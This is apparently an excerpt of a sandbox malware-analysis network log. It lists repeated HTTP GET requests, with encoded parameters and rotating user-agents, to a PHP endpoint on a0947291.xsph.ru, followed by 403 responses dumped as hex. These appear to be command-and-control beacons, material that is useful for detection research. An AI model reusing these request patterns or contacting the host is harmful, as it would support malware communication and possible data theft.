            Source: global trafficHTTP traffic detected: GET /1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&n8ux2yA6XyMoklAzV5ek7V=UqOdN8 HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&n8ux2yA6XyMoklAzV5ek7V=UqOdN8 HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: a0947291.xsph.ru
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&n8ux2yA6XyMoklAzV5ek7V=UqOdN8 HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&n8ux2yA6XyMoklAzV5ek7V=UqOdN8 HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: a0947291.xsph.ru
            Source: global trafficDNS traffic detected: DNS query: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:17:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:17:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 